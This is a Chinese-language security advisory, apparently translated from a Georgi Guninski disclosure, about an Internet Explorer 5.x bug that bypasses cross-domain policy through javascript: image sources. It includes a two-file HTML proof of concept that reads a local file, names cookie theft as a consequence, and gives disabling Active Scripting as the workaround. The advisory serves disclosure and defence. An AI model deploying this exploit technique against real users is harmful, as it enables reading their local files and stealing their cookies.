这篇文章里所表述的纯属个人意见,与任何公司无关。标准弃权通用条款适用,特别是Georgi
Guninski不对使用这个程序所提供的信息和功能而产生的直接或间接危害承担责任。Georgi Guninski不对这个程序的内容和误用以及由此引起的后果承担责任。
描述:
Windows 95系统中的Internet Explorer 5.01和WinNT 4.0系统中的Internet Explorer 5.5(其它版本可能也有这种故障)可以通过访问"旧"档案的DOM调用$#@60;IMG SRC="javascript:..."$#@62;以及在IE中设计漏洞,避开“十字结构安全策略”。这暴露了目标档案的整个DOM,有很大的安全隐患。后果会导致本地文件被阅读,从主机上读取任何文件,欺骗窗口得到cookies 等。
详述:
< t size="3">这是一个奇怪的发现。如果你在窗口打开一个包含旧文件的新文件,可通过新文件访问旧文件的DOM直到完全解析或显示新文件。
看起来是IE保存这个旧文件直到新文件完全被解析或打开。
如果你在新文件中放入$#@60;IMG SRC="javascript:..."$#@62;,它会读取旧文件的DOM。检查源码可得到更多的信息:
程序是:
-----------------img2main.html---------------------------------------
$#@60;A HREF="img2.html" TARGET="victim"$#@62;link$#@60;/A$#@62;
$#@60;SCRIPT$#@62;
alert("创建一个短的文本文件C:\\test.txt,这个文本文件就会被读取并在信息框里显示");
a=window.open("file://c:/test.txt","victim");
setTimeout("document.links[0].click()",2000);
$#@60;/SCRIPT$#@62;
---------------------------------------------------------------------
----------------img2.html--------------------------------------------
$#@60;HTML$#@62;
$#@60;IMG SRC="javascript:a=window.open(javascript:alert(\Here is your
file: \+opener.document.body.innerText));alert(Just an alert, but
is necessary. Wait a little.)"$#@62;
$#@60;/HTML$#@62;
---------------------------------------------------------------------
你可在网址http://www.nat.bg/~joro/img2main.html看到示范
工作区:禁用Active Scripting
相关文章